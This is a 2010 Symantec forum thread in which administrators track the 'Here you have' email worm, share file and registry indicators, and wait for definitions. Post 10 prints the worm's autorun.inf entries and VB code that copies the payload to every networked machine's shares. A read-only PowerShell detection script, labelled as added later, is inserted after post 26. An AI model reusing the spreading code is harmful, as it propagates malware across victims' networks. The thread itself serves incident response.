Endpoint Protection


0 Day threat/multiple spam messages "Here you have"


  • 1.  0 Day threat/multiple spam messages "Here you have"

    Posted Sep 09, 2010 03:08 PM
    Anyone else experiencing this?  The body of the messages hitting our GAL is as follows:

    Hello:

    This is The Document I told you about,you can find it Here.http://www.sharedocuments ******malicious link*************
    Please check it and reply as soon as possible.


    Cheers,



  • 2.  RE: 0 Day threat/multiple spam messages "Here you have"

    Posted Sep 09, 2010 03:16 PM
    We are seeing it here in California.



  • 3.  RE: 0 Day threat/multiple spam messages "Here you have"

    Posted Sep 09, 2010 03:21 PM
    Link is to a file with a .scr extension,  but appears to be an executable.   Messages are originating from our internal Exchange users and being sent to multiple distribution lists. 


  • 4.  RE: 0 Day threat/multiple spam messages "Here you have"

    Posted Sep 09, 2010 03:26 PM

    Many reports of this coming in - http://www.google.com/search?q=here+you+have+virus+email&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a#q=here+you+have+virus+email&num=10&hl=en&client=firefox-a&hs=vjS&rls=org.mozilla:en-US:official&prmd=ivu&tbs=mbl:1&tbo=u&ei=4DOJTKOFCobM8wSapuXeDg&sa=X&oi=realtime_result_group_more_results_link&ct=title&resnum=1&ved=0CCMQ5QUwAA&fp=7b300381c1cbb03f


  • 5.  RE: 0 Day threat/multiple spam messages "Here you have"

    Posted Sep 09, 2010 03:44 PM
    We have got the same. Any solution from Symantec yet?


  • 6.  RE: 0 Day threat/multiple spam messages "Here you have"

    Posted Sep 09, 2010 03:56 PM
    Huge virus outbreak at my firm.


  • 7.  RE: 0 Day threat/multiple spam messages "Here you have"

    Posted Sep 09, 2010 03:56 PM
    I opened a case with Symantec support,  they said a rapid release definition is forthcoming but no ETA at this time.


  • 8.  RE: 0 Day threat/multiple spam messages "Here you have"

    Posted Sep 09, 2010 04:04 PM
    If anyone does get word on a rapid release, please share.


  • 9.  RE: 0 Day threat/multiple spam messages "Here you have"

    Posted Sep 09, 2010 04:08 PM
    This is better served with an anti-spam product and not Endpoint Protection which has no Anti-spam capabilities natively.  

    It was submitted to Symantec's brightmail submission line for North America and I'm sure an anti-spam rule will be created asap.




  • 10.  RE: 0 Day threat/multiple spam messages "Here you have"

    Posted Sep 09, 2010 04:08 PM
    Here's what we've pulled out so far.  Your mileage may vary.

    The malicious file linked in the e-mail is shown as a pdf but it's actually a .scr.  I don't have the site here but we blocked it first thing.

    Files:
    Look for n73.image12.03.2009.JPG.scr and kill it.  Registry entries show “pdf*.scr” so anything matching that pattern is suspect.
    In c:\windows:
                    Csrss.exe <-that’s a big part of this
                    ff.exe
                    gc.exe
                    hst.iq
                    ie.exe
                    im.exe
                    op.exe
                    pspv.exe
                    rd.exe
                    re.exe
                    re.iq
                    tryme1.exe
     
    Registry:
                    Hklm\software\microsoft\windows nt\currentversion\image file execution options\<any key ending in ExE> <- pay attention to the case
                    Hklm\software\microsoft\search assistant\ACMru\5603 and possibly 5604

    Here's some code we pulled out of the .scr
     
    [autorun]
    open=open.exe
    icon=%windir%\system32\shell32.dll,8
    action=Open Drive to view files
    shell\open=Open
    shell\open\command=open.exe
    shell\open\default=1
    ' List Network Shares
    Const HKEY_LOCAL_MACHINE = &H80000002
    dim i
    i="0"
    strComputer = "."
    Set objWMIService = GetObject("winmgmts:" _
        & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
    Set colShares = objWMIService.ExecQuery("Select * from Win32_Share")
    For each objShare in colShares  
    strComputer = "."
    Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & _
        strComputer & "\root\default:StdRegProv")
    strKeyPath = "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
    strValueName = i
    strValue = objShare.Path
    oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
    i = i + 1
    Next
    on error resume next
    Dim domain
    Dim computer
    Set domain = GetObject("WinNT://Workgroup")
    domain.Filter = Array("Computer")
    For Each computer In domain
    strComp = computer.Name
    DoEvents
    FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\d\" & "N73.Image12.03.2009.JPG.scr"
    FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\c\" & "N73.Image12.03.2009.JPG.scr"
    FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\New Folder\" & "N73.Image12.03.2009.JPG.scr"
    FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\music\" & "N73.Image12.03.2009.JPG.scr"
    FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\print\" & "N73.Image12.03.2009.JPG.scr"
    FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\E\" & "N73.Image12.03.2009.JPG.scr"
    FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\F\" & "N73.Image12.03.2009.JPG.scr"
    FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\G\" & "N73.Image12.03.2009.JPG.scr"
    FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\H\" & "N73.Image12.03.2009.JPG.scr"
    Next
    Text4
    [autorun]
    open=open.exe
    icon=%SystemRoot%\system32\SHELL32.dll,4
    action=Open folder to view files
    shell\open=Open
    shell\open\command=open.exe
    shell\open\default=1


    /back to work, don't ask me for help I'm a little busy lol


  • 11.  RE: 0 Day threat/multiple spam messages "Here you have"

    Posted Sep 09, 2010 04:09 PM
    The messages are internal,  so obviously malware is involved here.


  • 12.  RE: 0 Day threat/multiple spam messages "Here you have"

    Posted Sep 09, 2010 04:18 PM

    2bde56d8fb2df4438192fb46cd0cc9c9

    you're welcome

    Link in the email is to  http://members.multimedia.co.uk/............


  • 13.  RE: 0 Day threat/multiple spam messages "Here you have"

    Posted Sep 09, 2010 04:21 PM
    First hit our corporate office and then spread through our subs.  First reports were at about 11:21am PDT.  Two hours later, Symantec has not raised their threat level and I cannot find any patches yet.


  • 14.  RE: 0 Day threat/multiple spam messages "Here you have"

    Posted Sep 09, 2010 04:41 PM
    We are finding open.exe and autorun.inf in their h drives


  • 15.  RE: 0 Day threat/multiple spam messages "Here you have"

    Posted Sep 09, 2010 05:00 PM

    We submitted to Symantec and here is the response:

    We have processed your submission (Tracking #------------) and your submission
    is now closed. The following is a report of our findings for the files in
    your submission:
     
    File:  C:\Documents and
    Settings\<some user id here>\Desktop\PDF_Document21_025542010_pdf.scr.trojan
    Machine: Machine
    Determination: This file is detected as 'Trojan Horse, ' with our existing
    Rapid Release definition set.
    URL: http://www.symantec.com/avcenter/venc/data/trojan.horse.html

    The link goes to "rapid release" defs from 2004.  So by Symantec's logic, this is something already handled by SEP?

    /golf clap.




  • 16.  RE: 0 Day threat/multiple spam messages "Here you have"

    Posted Sep 09, 2010 05:22 PM

    SEP will not stop a spam email if there's no malicious code in it as it's not an anti-spam product. The malicious code comes from clicking on the link IN the email. As Teiva-boy said, if you want to stop the email itself from spreading to your user, use your anti-spam solution to do so, and educate your users to not click on the link inside the email.


  • 17.  RE: 0 Day threat/multiple spam messages "Here you have"

    Posted Sep 09, 2010 05:27 PM
    Ted - I understand your point about spam and we are working to address that on our mail servers and spam blocking tools.  However, my concern is that once the link is clicked, SEP should block the malicious code from running and replicating the virus on the computer.  Our SEP is up to date and yet users (who shouldn't click on the link, but still do) are getting infected.  Does Symantec not intend to address this issue?


  • 18.  RE: 0 Day threat/multiple spam messages "Here you have"

    Posted Sep 09, 2010 05:36 PM

    This is a new variant of W32.Imsolk.A@mm. Have you downloaded the latest rapid release definitions? If not, then you do not have the most current definitions for this threat. "Trojan Horse" is a generic detection, most likely why the link for the RR definitions the previous poster mentioned was from 2004.

    Edit: Actually it seems that new definitions are not out yet according to an earlier poster in this thread. But as he said, Security Response is working on it.


  • 19.  RE: 0 Day threat/multiple spam messages "Here you have"

    Posted Sep 09, 2010 05:37 PM
    Just got off the phone with support. They said any rapid release definition sequence 114819 or higher should do the trick.


  • 20.  RE: 0 Day threat/multiple spam messages "Here you have"

    Posted Sep 09, 2010 05:40 PM

    Thanks for the information.

    There you have it folks, go get the RR definitions ASAP.


  • 21.  RE: 0 Day threat/multiple spam messages "Here you have"

    Posted Sep 09, 2010 05:50 PM

    If I update my SEPM using the JDB file procedures will my client get the new rapid release defs thru LU?



  • 22.  RE: 0 Day threat/multiple spam messages "Here you have"

    Posted Sep 09, 2010 05:51 PM

    Yup, run command on your groups and tell them to update content.


  • 23.  RE: 0 Day threat/multiple spam messages "Here you have"

    Posted Sep 09, 2010 06:05 PM
    Also just got an email from our SE. They will be releasing certified defs at 7PM EST.  Hope that helps.


  • 24.  RE: 0 Day threat/multiple spam messages "Here you have"

    Posted Sep 09, 2010 06:07 PM

    Trojan Horse is indeed a generic detection, and while the initial date on the threat on the Security Response page may be dated 2004, additional detections are being added all the time.

    sandra


  • 25.  RE: 0 Day threat/multiple spam messages "Here you have"

    Posted Sep 09, 2010 07:56 PM
    Is this only if you use your SEPM in conjunction with LOCAL LiveUpdate server, or will SEPM actually feed rapid definitions to clients regardless? Also, does anyone know if after running rapid release defs, main page on SEP client should change?


  • 26.  RE: 0 Day threat/multiple spam messages "Here you have"

    Posted Sep 09, 2010 07:58 PM
    To note, it spreads via network drive too, or should I say, it's copying autorun.inf and open.exe (inf points to exe, naturally) to ALL drives in My Computer, and if there are mapped drives, it will drop these two files in the root there as well. So scan your servers, too!
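The indicators in posts 10 and 26 (dropped files under c:\windows, autorun.inf and open.exe in drive roots, IFEO keys ending in the odd-cased "ExE", and the rogue csrss.exe still in memory from post 32) can be swept with a read-only script. This is an added example written for this thread, not a Symantec tool or anything posted above; it assumes an elevated PowerShell session on the suspect host and only reports, it removes nothing.

```powershell
# Added example (not from the thread): read-only sweep for the indicators
# named in posts 10, 26 and 32. Assumes an elevated PowerShell session.
$WindowsDir = $env:SystemRoot   # normally C:\Windows

# Filenames post 10 lists directly under c:\windows. The legitimate csrss.exe
# lives in System32, so a copy in the Windows root is suspect on its own.
$DroppedNames = 'csrss.exe','ff.exe','gc.exe','hst.iq','ie.exe','im.exe',
                'op.exe','pspv.exe','rd.exe','re.exe','re.iq','tryme1.exe'

$findings = New-Object System.Collections.Generic.List[string]

# 1. Dropped files in the Windows directory
foreach ($name in $DroppedNames) {
    $p = Join-Path $WindowsDir $name
    if (Test-Path -LiteralPath $p) { $findings.Add("file: $p") }
}

# 2. autorun.inf + open.exe and the pdf*.scr / N73 lure in the root of every
#    filesystem drive, mapped network drives included (post 26)
foreach ($drive in Get-PSDrive -PSProvider FileSystem) {
    $root = $drive.Root
    foreach ($name in 'autorun.inf','open.exe') {
        $p = Join-Path $root $name
        if (Test-Path -LiteralPath $p) { $findings.Add("drive root: $p") }
    }
    Get-ChildItem -LiteralPath $root -Filter '*.scr' -ErrorAction SilentlyContinue |
        Where-Object { -not $_.PSIsContainer } |
        Where-Object { $_.Name -like 'pdf*.scr' -or $_.Name -ieq 'N73.Image12.03.2009.JPG.scr' } |
        ForEach-Object { $findings.Add("lure: $($_.FullName)") }
}

# 3. Image File Execution Options subkeys whose name ends in "ExE" with that
#    exact casing (post 10); -cmatch is the case-sensitive operator
$ifeo = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
Get-ChildItem -Path $ifeo -ErrorAction SilentlyContinue |
    Where-Object { $_.PSChildName -cmatch 'ExE$' } |
    ForEach-Object { $findings.Add("IFEO key: $($_.PSChildName)") }

# 4. A csrss.exe running from anywhere but System32 (post 32: still in memory).
#    Reading .Path can fail for protected processes, so treat that as unknown.
$sys32 = Join-Path $WindowsDir 'System32'
Get-Process -Name csrss -ErrorAction SilentlyContinue | ForEach-Object {
    $path = $null
    try { $path = $_.Path } catch { }
    if ($path -and -not $path.StartsWith($sys32, [StringComparison]::OrdinalIgnoreCase)) {
        $findings.Add("process: csrss.exe pid $($_.Id) from $path")
    }
}

if ($findings.Count -eq 0) { 'No indicators from the thread found.' }
else { $findings | ForEach-Object { "SUSPECT  $_" } }
```

Run it against file servers as well as workstations, since post 26 notes the autorun.inf/open.exe pair is dropped into the root of every mapped drive.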


  • 27.  RE: 0 Day threat/multiple spam messages "Here you have"

    Posted Sep 09, 2010 08:50 PM
    Any update to the releasing of the updates? 

    FYI - we called a bit ago and the one that will come through Live Updates hasn't been released. 


  • 28.  RE: 0 Day threat/multiple spam messages "Here you have"

    Posted Sep 09, 2010 09:32 PM
    From Security Response's page:
    "Enterprise customers are protected by a Rapid Release signature set dated Sep 9th 2010 rev 023, or later. The next regular definition set to be published at 16:00 PST Sep 9th 2010 will contain the detection."

    Current definitions, as of this writing:


    Multiple Daily Updates

    • Symantec Endpoint Protection 11
    • Norton AntiVirus 2008 and newer
    Virus Definitions created 9/9/2010
    Virus Definitions released 9/9/2010
    Defs Version: 120909x
    Sequence Number: 114820
    Extended Version: 9/9/2010 rev. 24
    Total Detections (Threats & Risks): 8483569

    Daily Updates

    • Symantec AntiVirus
    • Norton AntiVirus 2006/2007
    Virus Definitions created 9/9/2010
    Virus Definitions released 9/9/2010
    Defs Version: 120909x
    Sequence Number: 114820
    Extended Version: 9/9/2010 rev. 24
    Total Detections (Threats & Risks): 8483569

    Detection for this threat should therefore be included currently.

    sandra


  • 29.  RE: 0 Day threat/multiple spam messages "Here you have"

    Posted Sep 09, 2010 09:52 PM
    Has the ETA for the certified definitions been pushed back? 


  • 30.  RE: 0 Day threat/multiple spam messages "Here you have"

    Posted Sep 09, 2010 09:53 PM
    Will a removal tool be posted?  McAfee appears to have one...


  • 31.  RE: 0 Day threat/multiple spam messages "Here you have"

    Posted Sep 09, 2010 10:07 PM

    Is there a location where Symantec is posting new information about this?  A blog perhaps?  

    These are the best analysis links I've come across thus far:

    http://www.threatexpert.com/report.aspx?md5=2bde56d8fb2df4438192fb46cd0cc9c9
    http://www.threatexpert.com/report.aspx?md5=bd9208edf44d0ee32b974a2d9da7bc61
     



  • 32.  RE: 0 Day threat/multiple spam messages "Here you have"

    Posted Sep 09, 2010 10:25 PM
    Does anyone know if SEP does a quick on-access scan once new definitions are loaded? I got r24 but csrss.exe is still alive and happy in memory and can be seen in Task Manager.


  • 33.  RE: 0 Day threat/multiple spam messages "Here you have"

    Posted Sep 09, 2010 11:45 PM

    Email I received from Symantec at 9pm EST indicates this is fixed in definitions "rev. 037".

    I'm only seeing rev 024 on the web site and it's now 11:45pm EST.  Hello Symantec, anybody home?



  • 34.  RE: 0 Day threat/multiple spam messages "Here you have"

    Posted Sep 10, 2010 12:03 AM
    I believe r37 are rapid dats. However, as in my post above, even rapid dats are unable to disinfect the file from memory.


  • 35.  RE: 0 Day threat/multiple spam messages "Here you have"

    Posted Sep 10, 2010 12:15 AM
    You should be able to set a scan "when new defs arrive" in SEPM


  • 36.  RE: 0 Day threat/multiple spam messages "Here you have"

    Posted Sep 10, 2010 12:30 AM

    The latest rapid release is dated 2010.09.09 rev.50.


  • 37.  RE: 0 Day threat/multiple spam messages "Here you have"

    Posted Sep 10, 2010 01:19 AM
    Do you have a direct link for these?


  • 38.  RE: 0 Day threat/multiple spam messages "Here you have"

    Posted Sep 10, 2010 02:01 AM
    Who marks a post as "solution"?  Shouldn't the affected customers decide when the issue has been resolved?


  • 39.  RE: 0 Day threat/multiple spam messages "Here you have"



  • 40.  RE: 0 Day threat/multiple spam messages "Here you have"

    Posted Sep 10, 2010 03:44 AM
    First update using rapid release updates and then try to scan. A signature has been added in the latest rapid release (ref: Security Response). You can download it from this link:
    Rapid Release Virus Definitions



  • 41.  RE: 0 Day threat/multiple spam messages "Here you have"



  • 42.  RE: 0 Day threat/multiple spam messages "Here you have"

    Posted Sep 10, 2010 05:43 AM
    Hello Forum Community,

    This blog posting is quite good. 

    New Round of Email Worm, "Here you have"  https://www-secure.symantec.com/connect/blogs/new-round-email-worm-here-you-have 

    Thanks and best regards,

    Mick


  • 43.  RE: 0 Day threat/multiple spam messages "Here you have"

    Posted Sep 10, 2010 07:38 AM


    Here is a writeup for the same

    W32.Imsolk.B@mm
    Web URL: http://www.symantec.com/security_response/writeup.jsp?docid=2010-090922-4703-99

    Certified LiveUpdate definitions have now been posted for the same.


  • 44.  RE: 0 Day threat/multiple spam messages "Here you have"

    Posted Sep 10, 2010 11:01 AM

    At first many thanks for the given Information!

    I used the rapid release update and the client(s) show Signature version 0909 v54 but in the dashboard the client is still shown as vulnerable to this threat!

    Why is that?

    Regards

    Stephan Gruhn



  • 45.  RE: 0 Day threat/multiple spam messages "Here you have"

    Posted Sep 10, 2010 11:09 AM

    I'm guessing you mean the dashboard on the SEPM, which is reporting historical information (last 12 hours).  Go with the actual signature date/revision.

    sandra



  • 46.  RE: 0 Day threat/multiple spam messages "Here you have"

    Posted Sep 10, 2010 11:50 AM

    So how can I compare the actual vulnerability status to the signature implemented on the client? Is there a resource where I can look up which definitions protect me against a specific threat?

    thanks for help

    Stephan



  • 47.  RE: 0 Day threat/multiple spam messages "Here you have"

    Posted Sep 17, 2010 10:47 AM

    I completely agree with this.  SEP Proactive Threat Protection should be able to catch this process SSMYPICS SCR running in memory.  Plus, you can't even add this to the exception list (only allows .EXE) to stop/quarantine it.

    It's broke.